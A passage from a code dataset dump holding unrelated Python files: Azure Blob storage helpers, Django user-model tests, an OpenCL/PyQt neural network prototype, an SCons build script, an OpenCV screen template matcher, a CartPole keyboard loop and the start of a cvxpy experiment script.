container somente apos testar se o mesmo existe\r\n\r\n blobService = BlockBlobService(account, key)\r\n\r\n if blobService.exists(containerName):\r\n\r\n blobService.delete_container(containerName)\r\n\r\n return \"O container foi excluido com sucesso.\"\r\n\r\n else:\r\n\r\n return \"O container nao especificado nao existe.\"\r\n\r\ndef criaBlobAzure(account, key, containerName, blobName, file):\r\n # Esse metodo deleta um container somente apos testar se o mesmo existe\r\n\r\n blobService = BlockBlobService(account, key)\r\n\r\n if blobService.exists(containerName):\r\n\r\n blobService.create_blob_from_path(containerName, blobName, file,\r\n content_settings=ContentSettings(content_type='text/csv'))\r\n\r\n return \"Blob \" + blobName + \" criado com sucesso no container: \" + containerName + \". \\nConta de criacao: \" + account + \"\"\r\n\r\n else:\r\n\r\n return \"O container especificado nao existe. O blob NAO foi criado com sucesso\"\r\n\r\ndef criaBlobApendavelAzure(account, key, containerName, blobName, file):\r\n # Nao implementado\r\n\r\n return \"Nao implementado\"\r\n\r\ndef criaBlobAzure_comPasta(account, key, containerName, blobName, file, folder):\r\n # Esse metodo deleta um container somente apos testar se o mesmo existe\r\n\r\n blobService = BlockBlobService(account, key)\r\n\r\n if blobService.exists(containerName):\r\n\r\n blobService.create_blob_from_path(containerName, folder+\"/\"+blobName, file,\r\n content_settings=ContentSettings(content_type='text/csv'))\r\n\r\n return \"Blob \" + blobName + \" criado com sucesso no container: \" + containerName + \". \\nConta de criacao: \" + account + \"\"\r\n\r\n else:\r\n\r\n return \"O container especificado nao existe. O blob NAO foi criado com sucesso\"\r\n\r\ndef criaBlobAzure_multiplosArquivos(account, key, containerName, folder):\r\n # Esse metodo faz o upload de todos os arquivos em uma pasta\r\n\r\n blobService = BlockBlobService(account, key)\r\n\r\n files = os.listdir(folder)\r\n\r\n if blobService.exists(containerName):\r\n\r\n for name in files:\r\n\r\n blobService.create_blob_from_path(containerName, os.path.basename(name), folder + \"\\\\\" + name,\r\n content_settings=ContentSettings(content_type='text/csv'))\r\n\r\n print(folder + \"\\\\\" + name + \"| Carregado no blob\")\r\n\r\n return \"Multiplos arquivos criados no blob | Criado no container: \" + containerName + \"\"\r\n\r\n else:\r\n\r\n return \"O container especificado nao existe. O blob NAO foi criado com sucesso\"\r\n\r\ndef deletaBlobAzure(account, key, containerName, blobName):\r\n # Esse metodo deleta um container somente apos testar se o mesmo existe\r\n\r\n blobService = BlockBlobService(account, key)\r\n\r\n if blobService.exists(containerName):\r\n\r\n blobService.delete_blob(containerName, blobName)\r\n\r\n return \"Blob: \" + blobName + \"| Deletado com sucesso\"\r\n\r\n else:\r\n\r\n return \"O container especificado nao existe. O blob NAO foi criado com sucesso\"\r\n\r\ndef baixaBlobAzure(account, key, containerName, blobName, caminho):\r\n # Faz o download de um blob specifico de um container expecifico\r\n\r\n blobService = BlockBlobService(account, key)\r\n\r\n if blobService.exists(containerName):\r\n\r\n blobService.get_blob_to_path(containerName, blobName, caminho+\"/\"+blobName)\r\n\r\n return \"Blob: \" + blobName + \"| Criado com sucesso\"\r\n\r\n else:\r\n\r\n return \"O container especificado nao existe. O blob nao foi baixado com sucesso\"\r\n\r\ndef listarBlobAzure(account, key, containerName):\r\n # Lista todos os blobs de um container\r\n\r\n blobService = BlockBlobService(account, key)\r\n\r\n if blobService.exists(containerName):\r\n\r\n generator = blobService.list_blobs(containerName)\r\n\r\n listaBlobs = \"\"\r\n\r\n for blob in generator:\r\n\r\n print(blob.name)\r\n\r\n listaBlobs = listaBlobs + str(blob.name) + \"|\"\r\n\r\n print(\"Lista com todos os blobs nesse container.\")\r\n\r\n return listaBlobs\r\n\r\n else:\r\n\r\n blobService.create_container(containerName)\r\n\r\n return \"O container citado nao existe.\"\r\n\r\n","sub_path":"azureBlobUtils.py","file_name":"azureBlobUtils.py","file_ext":"py","file_size_in_byte":5151,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"191696803","text":"import django\nimport pytest\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.auth.signals import user_logged_in\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.test import Client\nfrom django.utils import timezone\n\nfrom mcod.users.models import Token, get_token_expiration_date\n\nUser = get_user_model()\n\n\n@pytest.mark.django_db\ndef test_user_create(inactive_user):\n usr = User.objects.get(email=inactive_user.email)\n assert usr.id == inactive_user.id\n assert usr.last_login is None\n assert usr.state == 'pending'\n\n\n@pytest.mark.django_db\ndef test_last_login(inactive_user):\n now = timezone.now()\n user_logged_in.send(User, request=None, user=inactive_user)\n usr = User.objects.get(email=inactive_user.email)\n assert now < usr.last_login\n\n\n@pytest.mark.django_db\ndef test_email_unique():\n with pytest.raises(django.core.exceptions.ValidationError) as e:\n User.objects.create_user('aaa@example.com', 'Britenet.1')\n User.objects.create_user('aaa@example.com', 'Britenet.1')\n assert 'email' in e.value.message_dict\n\n\n@pytest.mark.django_db\ndef test_is_active(active_user):\n assert active_user.state == 'active'\n assert active_user.is_active is True\n\n\n@pytest.mark.django_db\ndef test_admin_panel_access_flag(active_user):\n assert active_user.system_role == 'user'\n\n active_user.is_superuser = True\n assert active_user.system_role == 'staff'\n\n active_user.is_superuser = False\n active_user.is_staff = True\n assert active_user.system_role == 'staff'\n\n\n@pytest.mark.django_db\ndef test_check_session_valid(mocker):\n usr = User.objects.create_user('aaa@example.com', 'Britenet.1')\n assert usr.check_session_valid(None) is False\n assert usr.check_session_valid('aaa') is False\n\n mocker.patch('mcod.users.models.decode_jwt_token', return_value={'user': {}})\n assert usr.check_session_valid('aaa') is False\n\n mocker.patch('mcod.users.models.decode_jwt_token', return_value={'user': {'session_key': 1234}})\n assert usr.check_session_valid('aaa') is False\n\n mocker.patch('mcod.users.models.decode_jwt_token', return_value={'user': {'session_key': 1234}})\n mocker.patch('mcod.users.models.session_cache.get', return_value={})\n assert usr.check_session_valid('aaa') is False\n\n mocker.patch('mcod.users.models.decode_jwt_token', return_value={'user': {'session_key': 1234}})\n mocker.patch('mcod.users.models.session_cache.get', return_value={'_auth_user_hash': 'aaaaa'})\n assert usr.check_session_valid('aaa') is False\n\n mocker.patch('mcod.users.models.decode_jwt_token', return_value={'user': {'session_key': 1234}})\n mocker.patch('mcod.users.models.session_cache.get', return_value={'_auth_user_hash': 'aaaaa', '_auth_user_id': '0'})\n assert usr.check_session_valid('aaa') is False\n\n mocker.patch('mcod.users.models.decode_jwt_token', return_value={'user': {'session_key': 1234}})\n mocker.patch('mcod.users.models.session_cache.get',\n return_value={'_auth_user_hash': 'aaaaaa', '_auth_user_id': str(usr.id)})\n assert usr.check_session_valid('aaa') is False\n\n mocker.patch('mcod.users.models.decode_jwt_token', return_value={'user': {'session_key': 1234}})\n mocker.patch('mcod.users.models.session_cache.get',\n return_value={'_auth_user_hash': usr.get_session_auth_hash(), '_auth_user_id': str(usr.id)})\n mocker.patch('mcod.users.models.constant_time_compare', return_value=False)\n assert usr.check_session_valid('aaa') is False\n\n mocker.patch('mcod.users.models.decode_jwt_token', return_value={'user': {'session_key': 1234}})\n mocker.patch('mcod.users.models.session_cache.get',\n return_value={'_auth_user_hash': usr.get_session_auth_hash(), '_auth_user_id': str(usr.id)})\n mocker.patch('mcod.users.models.constant_time_compare', return_value=True)\n assert usr.check_session_valid('aaa') is True\n\n\n@pytest.mark.django_db\ndef test_tokens(active_user):\n assert active_user.tokens.count() == 0\n\n email_token1 = active_user.email_validation_token\n password_reset_token1 = active_user.password_reset_token\n\n assert email_token1 != password_reset_token1\n assert active_user.tokens.count() == 2\n\n token_obj = Token.objects.get(token=email_token1)\n now = timezone.now()\n token_obj.expiration_date = now\n token_obj.save()\n assert token_obj.is_valid is False\n\n email_token2 = active_user.email_validation_token\n assert email_token1 != email_token2\n assert active_user.tokens.count() == 3\n\n email_token3 = active_user.email_validation_token\n assert email_token3 == email_token2\n assert active_user.tokens.count() == 3\n\n token = Token.objects.create(user=active_user, token_type=0)\n assert token.is_valid is True\n assert active_user.tokens.count() == 4\n\n email_token4 = active_user.email_validation_token\n assert token.token == email_token4\n assert email_token3 != email_token4\n\n exp_date = get_token_expiration_date().date()\n\n assert token.expiration_date.date() == exp_date\n\n\n@pytest.mark.django_db\nclass TestLogin(object):\n\n def test_admin_can_login_to_admin_panel(self, admin_user):\n client = Client()\n response = client.get(\"/\")\n assert response.status_code == 302\n assert response.url == '/login/?next=/'\n client.login(email=admin_user.email, password=\"Britenet.1\")\n response = client.get(\"/\")\n assert response.status_code == 200\n\n def test_editor_can_login_to_admin_panel(self, editor_user):\n client = Client()\n response = client.get(\"/\")\n assert response.status_code == 302\n assert response.url == '/login/?next=/'\n client.login(email=editor_user.email, password=\"Britenet.1\")\n response = client.get(\"/\")\n assert response.status_code == 200\n\n def test_active_user_cant_login_to_admin_panel(self, active_user):\n client = Client()\n response = client.get(\"/\")\n assert response.status_code == 302\n assert response.url == '/login/?next=/'\n client.login(email=active_user.email, password=\"Britenet.1\")\n response = client.get(\"/\")\n assert response.status_code == 302\n\n\n@pytest.mark.django_db\ndef test_user_manager_create_superuser():\n superuser = User.objects.create_superuser(None, \"superadmin@test.pl\", \"password\")\n assert superuser.email == \"superadmin@test.pl\"\n assert superuser.is_staff\n assert superuser.is_superuser\n assert superuser.state == 'active'\n assert str(superuser) == \"superadmin@test.pl\"\n\n\n@pytest.mark.django_db\ndef test_user_soft_delete(active_user):\n u = active_user\n u.delete()\n assert u.is_removed is True\n assert User.objects.get(id=active_user.id)\n\n\n@pytest.mark.django_db\ndef test_user_unsafe_delete(active_user):\n u = active_user\n u.delete(soft=False)\n with pytest.raises(ObjectDoesNotExist):\n User.objects.get(id=active_user.id)\n","sub_path":"mcod/users/tests/test_models.py","file_name":"test_models.py","file_ext":"py","file_size_in_byte":6937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"242544397","text":"import os\nos.environ['PYOPENCL_COMPILER_OUTPUT'] = '1' # show opencl compiler output\nimport numpy as np\nimport pyopencl as cl\nimport pyopencl.tools\nimport sys\nfrom PyQt5.QtWidgets import QApplication, QWidget, QPushButton\nfrom PyQt5 import QtCore\n\ndef _in_range(value, low, high):\n\treturn (value >= low) and (value <= high)\n\ndef _check_type(*types):\n\tdef check(method):\n\t\tdef wrapper(self, *args, **kwargs):\n\t\t\tif len(types) != len(args):\n\t\t\t\traise Exception(\"Unequal types and arguments size.\")\n\t\t\tfor index, arg in enumerate(args):\n\t\t\t\tif not isinstance(arg, types[index]):\n\t\t\t\t\traise Exception('Invalid argument type. Expected \"{0}\" but \"{1}\" found.'.format(types[index].__name__, type(arg).__name__))\n\t\t\treturn method(self, *args, **kwargs)\n\t\treturn wrapper\n\treturn check\n\nclass NumpyArray:\n\tdef __init__(self, dtype):\n\t\tself.dtype = dtype\n\t\tself.data = np.empty((100,)).astype(self.dtype)\n\t\tself.capacity = 100\n\t\tself.size = 0\n\t\t\n\tdef update(self, row):\n\t\tfor r in row:\n\t\t\tself.add(r)\n\n\tdef add_empty(self):\n\t\tself.update(np.empty((1,)).astype(self.dtype))\n\n\tdef add(self, x):\n\t\tif self.size == self.capacity:\n\t\t\tself.capacity *= 2\n\t\t\tnew_data = np.empty((self.capacity,)).astype(self.dtype)\n\t\t\tnew_data[:self.size] = self.data\n\t\t\tself.data = new_data\n\n\t\tself.data[self.size] = x\n\t\tself.size += 1\n\n\tdef finalize(self):\n\t\tself.capacity = self.size\n\t\tself.data.resize((self.size,))\n\t\treturn self.data\n\nclass OpenClType:\n\tdef __init__(self, ctx, name, dtype):\n\t\tself.dtype = dtype\n\t\tself.dtype, self.ctype = self.__register_type(ctx.devices[0], dtype, name)\n\n\tdef __register_type(self, device, dtype, name):\n\t\tnew_dtype, ctype = pyopencl.tools.match_dtype_to_c_struct(device, name, dtype)\n\t\tpyopencl.tools.get_or_register_dtype(name, new_dtype)\n\t\tprint('Register type with name \"{name}\" successfully done:\\n\\n{ctype}'.format(name = name, ctype = ctype))\n\t\treturn new_dtype, ctype\n\nclass ConnectionType:\n\tExcitatory = 0\n\tInhibitory = 1\n\nclass Connection:\n\tdef __init__(self, from_layer, connection_type = ConnectionType.Excitatory):\n\t\tassert (from_layer is not None)\n\t\tself.fromlayer = from_layer\n\t\tself.connection_type = connection_type\n\ndef _create_filled_item(dtype, **kwargs):\n\titem = np.empty((1,)).astype(dtype)\n\tfor key in kwargs:\n\t\titem[0][key] = kwargs[key]\n\treturn item\n\nclass Layer:\n\t\"\"\"Describe single layer of neural network\"\"\"\n\tdef __init__(self, width, threshold, synapses_quantity, height = 1, init_weights = 1., \n\t\t learning_rate = 0.005, stability_factor = 0.95):\n\t\tself.width = width\n\t\tself.height = height\n\t\tself.threshold = threshold\n\t\tassert _in_range(init_weights, 0, 1)\n\t\tself.init_weights = init_weights\n\t\tself.connections = []\n\t\tassert (len(synapses_quantity) <= 2)\n\t\tassert _in_range(stability_factor, 0., 1.)\n\t\tif len(synapses_quantity) == 1:\n\t\t\tself.synapses_minimum = synapses_quantity[0]\n\t\t\tself.synapses_maximum = self.synapses_minimum\n\t\telse:\n\t\t\tself.synapses_minimum, self.synapses_maximum = synapses_quantity[0], synapses_quantity[1]\n\t\tself.synapses_quantity = synapses_quantity\n\t\tself.learning_rate = learning_rate\n\t\tself.stability_factor = stability_factor\n\n\tdef addConnections(self, *connections):\n\t\tself.connections += connections\n\n\tdef build(self, network):\n\t\tself.begin = network.neurons_array.size\n\t\tself.size = self.width * self.height\n\t\tself.end = self.begin + self.size\n\t\tnetwork.layers_array.update(\n\t\t\t_create_filled_item(\n\t\t\t\tnetwork.layer_type.dtype, \n\t\t\t\tsynapses_minimum = self.synapses_minimum,\n\t\t\t\tsynapses_maximum = self.synapses_maximum,\n\t\t\t\tlearning_rate = self.learning_rate,\n\t\t\t\tstability_factor = self.stability_factor,\n\t\t\t\tthreshold = self.threshold))\n\n\t\tneurons = np.zeros(self.size).astype(network.neuron_type.dtype)\n\t\tnetwork.neurons_array.update(neurons)\n\t\tyield\n\t\tfor x in self.connections:\n\t\t\tif isinstance(x, FullConnection):\n\t\t\t\tprint('FullConnection')\n\t\t\telif isinstance(x, NeuronToNeuronConnection):\n\t\t\t\tif (x.from_layer.width != self.width) or (x.from_layer.height != self.height):\n\t\t\t\t\traise Exception(\"Layers are different\")\n\t\t\t\t# i = int(0)\n\t\t\t\t# for n in network.neurons_array[self.begin:self.end]:\n\t\t\t\t# \tn[]\n\t\t\telif isinstance(x, CircularConnection):\n\t\t\t\tprint('CircularConnection')\n\t\t\telif isinstance(x, RectangularConnection):\n\t\t\t\tprint('RectangularConnection')\n\t\tyield\n\nclass FullConnection(Connection):\n\t\"\"\"Full connection\"\"\"\n\tdef __init__(self, from_layer, connection_type = ConnectionType.Excitatory):\n\t\tsuper(FullConnection, self).__init__(from_layer, connection_type)\n\nclass NeuronToNeuronConnection(Connection):\n\t\"\"\"Neuron to neuron connection\"\"\"\n\tdef __init__(self, from_layer, connection_type = ConnectionType.Excitatory):\n\t\tsuper(NeuronToNeuronConnection, self).__init__(from_layer, connection_type)\n\nclass CircularConnection(Connection):\n\t\"\"\"Circle or ring connection\"\"\"\n\tdef __init__(self, from_layer, radius, inner_radius = int(0), connection_type = ConnectionType.Excitatory):\n\t\tsuper(CircularConnection, self).__init__(from_layer, connection_type)\n\t\tself.radius = radius\n\t\tself.inner_radius = inner_radius\n\nclass RectangularConnection(Connection):\n\t\"\"\"Rectangular connection\"\"\"\n\tdef __init__(self, from_layer, width, height, connection_type = ConnectionType.Excitatory):\n\t\tsuper(RectangularConnection, self).__init__(from_layer, connection_type)\n\t\tself.width = width\n\t\tself.height = height\n\nclass Profiler(object):\n\tdef __enter__(self):\n\t\tself.time = QtCore.QTime()\n\t\tself.time.start()\n\n\tdef __exit__(self, type, value, traceback):\n\t\tprint(\"Elapsed time: {0} msec\".format(self.time.elapsed()))\n\nclass NeuralNetwork:\n\t\"\"\"Describe whole neural network\"\"\"\n\tdef __init__(self):\n\t\tself.layers = []\n\n\tdef addLayers(self, *layers):\n\t\t\"\"\" Add layers to neural network \"\"\"\n\t\tself.layers += layers\n\n\tdef build(self):\n\t\t\"\"\" Build neural network \"\"\"\n\t\tself.ctx = cl.create_some_context()\n\t\tself.layer_type = OpenClType(self.ctx, 'Layer', np.dtype([\n\t\t (\"synapses_minimum\", np.uint32),\n\t\t\t (\"synapses_maximum\", np.uint32),\n\t\t\t (\"learning_rate\", np.float32),\n\t\t\t (\"stability_factor\", np.float32),\n\t\t\t (\"threshold\", np.float32)]))\n\t\tself.neuron_type = OpenClType(self.ctx, 'Neuron', np.dtype([\n\t\t\t (\"activated\", np.uint32), \n\t\t\t (\"layer_idx\", np.uint32),\n\t\t\t (\"excitatory_begin\", np.uint32),\n\t\t\t (\"excitatory_end\", np.uint32),\n\t\t\t (\"inhibitory_begin\", np.uint32),\n\t\t\t (\"inhibitory_end\", np.uint32),\n\t\t\t (\"voltage\", np.float32)]))\n\t\tself.exc_synapses_type = OpenClType(self.ctx, 'ExcitatorySynapse', np.dtype([\n\t\t\t (\"weight\", np.float32),\n\t\t\t\t (\"neuron_index\", np.uint32)]))\n\t\tself.inh_synapses_type = OpenClType(self.ctx, 'InhibitorySynapse', np.dtype([\n\t\t\t (\"neuron_index\", np.uint32)]))\n\t\tself.layers_array = NumpyArray(self.layer_type.dtype)\n\t\tself.excitatory_synapses_array = NumpyArray(self.exc_synapses_type.dtype)\n\t\tself.inhibitory_synapses_array = NumpyArray(self.inh_synapses_type.dtype)\n\t\tself.excitatory_synapses_array.add_empty()\n\t\tself.inhibitory_synapses_array.add_empty()\n\t\tself.neurons_array = NumpyArray(self.neuron_type.dtype)\n\t\tstages = []\n\t\tfor x in self.layers:\n\t\t\tstage = x.build(self)\n\t\t\tstages.append(stage)\n\t\t\tnext(stage)\n\t\tself.layers_array.finalize()\n\t\tself.neurons_array.finalize()\n\t\tfor stage in stages:\n\t\t\tnext(stage)\n\t\tself.excitatory_synapses_array.finalize()\n\t\tself.inhibitory_synapses_array.finalize()\n\n\tdef tick(self):\n\t\t''' Single tick '''\n\t\twith Profiler() as p:\n\t\t\tself.program.Activation(self.queue, self.neurons_array.data.shape, None, self.neurons_buffer, self.layers_buffer)\n\t\t\t#self.program.Learning(self.queue, self.neurons_array.data.shape, None, self.neurons_buffer, self.layers_buffer, self.excitatory_buffer, self.inhibitory_buffer)\n\t\t\tself.program.Reset(self.queue, self.neurons_array.data.shape, None, self.neurons_buffer)\n\t\t\t# copy buffer from device\n\t\t\tcl.enqueue_copy(self.queue, self.neurons_array.data, self.neurons_buffer)\n\n\tdef run(self, duration):\n\t\tf = open(\"ocl/kernel.cl\")\n\t\tself.kernel = ''.join([\n\t\t\tself.layer_type.ctype, \n\t\t\tself.neuron_type.ctype, \n\t\t\tself.exc_synapses_type.ctype, \n\t\t\tself.inh_synapses_type.ctype, \n\t\t\tf.read()])\n\t\tf.close()\n\t\tprint(self.kernel)\n\t\tself.program = cl.Program(self.ctx, self.kernel).build()\n\n\t\tmf = cl.mem_flags\n\t\tself.neurons_buffer = cl.Buffer(self.ctx, mf.READ_WRITE | mf.COPY_HOST_PTR, hostbuf = self.neurons_array.data)\n\t\tself.excitatory_buffer = cl.Buffer(self.ctx, mf.READ_WRITE | mf.COPY_HOST_PTR, hostbuf = self.excitatory_synapses_array.data)\n\t\tself.inhibitory_buffer = cl.Buffer(self.ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf = self.inhibitory_synapses_array.data)\n\t\tself.layers_buffer = cl.Buffer(self.ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf = self.layers_array.data)\n\n\t\tself.queue = cl.CommandQueue(self.ctx)\n\t\tself.timer = QtCore.QTimer()\n\t\tself.timer.timeout.connect(self.tick)\n\t\tself.timer.start(duration)\n\n\tdef stop(self):\n\t\tself.timer.stop()\n\ndef opencl_test():\n\n\n\tmy_dtype = np.dtype([(\"a_g\", np.float32), (\"b_g\", np.float32)])\n\t\n\ta_np = np.empty(3).astype(my_dtype)\n\tfor x in a_np:\n\t\tx[0] = np.random.rand(1)\n\t\tx[1] = np.random.rand(1)\n\n\tctx = cl.create_some_context()\n\n\tmy_dtype, ctype = pyopencl.tools.match_dtype_to_c_struct(ctx.devices[0], 'my_type', my_dtype)\n\tpyopencl.tools.get_or_register_dtype('my_type', my_dtype)\n\n\tqueue = cl.CommandQueue(ctx)\n\n\tmf = cl.mem_flags\n\ta = cl.Buffer(ctx, mf.READ_ONLY | mf.COPY_HOST_PTR, hostbuf=a_np)\n\n\tprg = cl.Program(ctx, ctype + \"\"\"\n\t__kernel void sum(__global const my_type *a, __global float *res_g) {\n\t unsigned int gid = get_global_id(0);\n\t res_g[gid] = a[gid].a_g + a[gid].b_g;\n\t}\n\t\"\"\").build()\n\n\tres_g = cl.Buffer(ctx, mf.WRITE_ONLY, 3 * np.dtype('float32').itemsize)\n\tprg.sum(queue, a_np.shape, None, a, res_g)\n\n\tres_np = np.empty(3).astype(np.float32)\n\tcl.enqueue_copy(queue, res_np, res_g)\n\n\t# Check on CPU with Numpy:\n\tprint(res_np)\n\t# print(res_np - (a_np + b_np))\n\t# print(np.linalg.norm(res_np - (a_np + b_np)))\n\n\t\t\ndef click_event(self):\n\tprint('Click')\n\nif __name__ == '__main__':\n\t\n\tapp = QApplication(sys.argv)\n\n\twidget = QWidget()\n\twidget.resize(250, 150)\n\twidget.setWindowTitle('simple')\n\n\tpushButton = QPushButton('Press me...', widget)\n\tpushButton.move(50, 50)\n\tpushButton.clicked.connect(click_event)\n\n\twidget.show()\n\n\tnn = NeuralNetwork()\n\tlayer1 = Layer(width = 15, height =15, threshold = 1, synapses_quantity = (6,))\n\tlayer2 = Layer(width = 15, height =15, threshold = 1, synapses_quantity = (6, 10))\n\tnn.addLayers(layer1, layer2)\n\n\tlayer1.addConnections(FullConnection(layer2), CircularConnection(layer2, 10, connection_type = ConnectionType.Inhibitory))\n\n\tnn.build()\n\tnn.run(1000)\n\t#nn.stop()\n\t\n\tsys.exit(app.exec_())","sub_path":"kassy.py","file_name":"kassy.py","file_ext":"py","file_size_in_byte":10718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"38476761","text":"#!python\n# (C) Copyright 2018-2021 Intel Corporation.\n#\n# SPDX-License-Identifier: BSD-2-Clause-Patent\n#\n\"\"\"Build swim src\"\"\"\n\nSRC = ['swim.c']\n\ndef scons():\n \"\"\"Scons function\"\"\"\n\n Import('env')\n\n env.AppendUnique(LIBPATH=[Dir('.')])\n\n denv = env.Clone()\n\n denv.AppendUnique(CPPPATH=['#/src/cart/swim'])\n denv.AppendUnique(LIBS=['gurt'])\n denv.Append(CCFLAGS=['-D_USE_CART_'])\n\n swim_targets = denv.SharedObject(SRC)\n swim_lib = denv.SharedLibrary('libswim', swim_targets)\n\n Default(swim_targets)\n Export('swim_lib', 'swim_targets')\n\nif __name__ == \"SCons.Script\":\n scons()\n","sub_path":"src/cart/swim/SConscript","file_name":"SConscript","file_ext":"","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"198228774","text":"import os\nimport cv2\nfrom PIL import ImageGrab\nimport numpy as np\nfrom base import log\nfrom base import baseenum\n\nclass ImageEngine:\n\n def __init__(self, registerengine):\n self.registerengine = registerengine\n self.ospath = registerengine.ospath\n self.method = 'cv2.TM_CCOEFF_NORMED'\n\n\n def getimagebypath(self, imagename):\n rootpath = os.path.dirname(os.getcwd()) + \"/Resource/\" + \"%s\" % self.ospath + \"/\"\n imagepath = rootpath + imagename + \".png\"\n\n # Log.log(imagepath)\n\n image = cv2.imread(imagepath,0)\n return image\n\n def find_picture(self, imagename):\n\n try:\n # get image by image name\n image = self.getimagebypath(imagename)\n\n # get screen shot\n # backgroundshot = ImageGrab.grab((0, 0, self.endx, self.endy))\n backgroundshot = ImageGrab.grab()\n # backgroundshot.save(\"C:\\\\Users\\\\baijuyi\\\\Documents\\\\GitHub\\\\yys2\\\\Resource\\\\1.png\")\n\n # convert screen shot to image\n backgroundimage = np.array(backgroundshot.convert('L'))\n\n res = cv2.matchTemplate(backgroundimage, image, eval(self.method))\n\n min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)\n\n # similar rate\n value = max_val\n\n if value > 0.9:\n # get picture position\n top_left = max_loc\n\n # get center point\n w, h = image.shape[::-1]\n x = int(top_left[0])\n y = int(top_left[1])\n\n #compute click point\n x = int(top_left[0] + w / 2)\n y = int(top_left[1] + h / 2)\n\n\n # resize location if macos\n x = int(x / self.registerengine.ratex)\n y = int(y / self.registerengine.ratey)\n\n else:\n x = 0\n y = 0\n log.log(\"image name is '%s' and similar value is '%s' and x,y is '%s,%s'\" % (imagename, value, x, y))\n self.registerengine.lastx = x\n self.registerengine.lasty = y\n return x\n except:\n return 0\n\n\n\n\n\n\n\n\n\n\n\n #\n # def match(self,img2,template2):\n # template = template2.copy()\n # w, h = template.shape[::-1]\n # x = 0\n # y = 0\n # value = 0\n #\n #\n # # 6 中匹配效果对比算法\n # methods = ['cv2.TM_CCOEFF_NORMED']\n #\n # # methods = ['cv2.TM_CCOEFF', 'cv2.TM_CCOEFF_NORMED', 'cv2.TM_CCORR', 'cv2.TM_CCORR_NORMED', 'cv2.TM_SQDIFF', 'cv2.TM_SQDIFF_NORMED']\n #\n # for meth in methods:\n # img = img2.copy()\n #\n # method = eval(meth)\n #\n # res = cv2.matchTemplate(img, template, method)\n #\n #\n #\n # min_val, max_val, min_loc, max_loc = cv2.minMaxLoc(res)\n #\n # if method in [cv2.TM_SQDIFF, cv2.TM_SQDIFF_NORMED]:\n # top_left = min_loc\n # value = min_val\n # else:\n # top_left = max_loc\n # value = max_val\n #\n #\n # x = int(top_left[0] + w / 2)\n # y = int(top_left[1] + h / 2)\n #\n # if value > 0.9:\n # return x, y\n # else:\n # return 0, 0","sub_path":"engine/ImageEngine.py","file_name":"ImageEngine.py","file_ext":"py","file_size_in_byte":3277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"516694587","text":"import gym\r\nimport readchar\r\n\r\nenv = gym.make(\"CartPole-v1\")\r\ngoal_steps = 500 #목표치\r\n\r\narrow_keys = {'\\x1b[C': 0,'\\x1b[D': 1} #키보드 동작 숫자와 매핑\r\n\r\nenv.reset()\r\nenv.render()\r\n\r\n\r\nwhile True:\r\n sum_reward = 0\r\n env.reset()\r\n for i in range(goal_steps):\r\n key = readchar.readkey() #키 입력 받아오기 \r\n action = arrow_keys[key]\r\n obs, reward, done, info = env.step(action) #키 입력대로 행동하고 기록\r\n sum_reward += reward\r\n if done: \r\n break\r\n env.render()\r\n print(\"게임종료. 점수 :\",sum_reward)\r\n\r\n'''import gym\r\nfrom gym.envs.registration import register\r\nimport readchar \r\n\r\narrow_keys = {'\\x1b[C': 0,'\\x1b[D': 1}\r\n\r\nenv = gym.make(\"CartPole-v1\")\r\nenv.reset()\r\nenv.render() # Show the initial board\r\nwhile True:\r\n # Choose an action from keyboard\r\n key = readchar.readkey() # 사용자로부터 action(키보드 입력)을 직접 받는다.\r\n if key not in arrow_keys.keys():\r\n print(\"Game aborted!\")\r\n break\r\n action = arrow_keys[key] # 사용자료부터 입력받은 키보드 값에 해당하는 value인 UP, DOWN, RIGHT, LEFT는 모두 각각에 해당하는 숫자들이 있다. 이 숫자이 action 변수에 저장된다.\r\n state, reward, done, info = env.step(action)\r\n env.render() # Show the board after action\r\n print(\"State: \", state, \"Action: \", action,\r\n \"Reward: \", reward, \"Info: \", info)\r\n print(\"[INFO] done:\", done)\r\n if done:\r\n print(\"Finished with reward\", reward)\r\n break'''","sub_path":"rl/python/machine/cartpole_key.py","file_name":"cartpole_key.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"469347941","text":"import os\nimport numpy as np\nimport cvxpy as cp\nimport scipy.io as sio\nimport scipy.misc\n\nfrom utils import setup_logger\n\nimport argparse\n\nparser = argparse.ArgumentParser(description='Test LADMM with synthetic data')\nparser.add_argument('-c', '--cols', type=int, default=0, help='number of columns in A to be replaced')\nparser.add_argument('-p', '--p', type=float, default=0.2, help='p in the Bernoulli distribution')\nparser.add_argument('-m', '--mu', type=float, default=0.0, help='mu of Gaussian dist')\nparser.add_argument('-s', '--sigma', type=float, default=2.0, help='sigma of Gaussian dist')\nparser.add_argument('--data-type', type=str, default='gaussian', help='data type')\nparser.add_argument('-a', '--alpha', type=float, default=0.01, help='hyper-param in the objective')\nparser.add_argument('-e', '--epsilon', type=float, default=1e-4, help='hyper-param in the objective')\nparser.add_argument('--split', type=str, default='test', help='calculate train or test split')\nparser.add_argument('--batch-size', type=int, default=20, help='batch size')\n\ndef loss_l1(X):\n return cp.sum(cp.abs(X))\n\ndef loss_l2(X):\n return cp.sum(X**2)\n\ndef augmented_objective_fn(Z, E, alpha, eps):\n Z_part = alpha * (loss_l1(Z) + eps / 2.0 * loss_l2(Z))\n E_part = loss_l1(E) + eps / 2.0 * loss_l2(E)\n return (Z_part + E_part) / Z.shape[1]\n\nif __name__ == '__main__':\n args = parser.parse_args()\n\n alpha = args.alpha\n eps = args.epsilon\n split = args.split\n batch_size = args.batch_size\n\n # test data file\n test_file = 'syn_data'\n test_file += '_cols{}'.format(args.cols) if args.cols > 0 else ''\n test_file += '_p{}_mu{}_s{}'.format(args.p, args.mu, args.sigma)\n test_file += '_{}'.format(args.data_type) if args.data_type != 'gaussian' else ''\n test_file += '.mat'\n print('using testing data file {}'.format(test_file))\n\n # logger file\n if not os.path.isdir('cvx-solutions'):\n 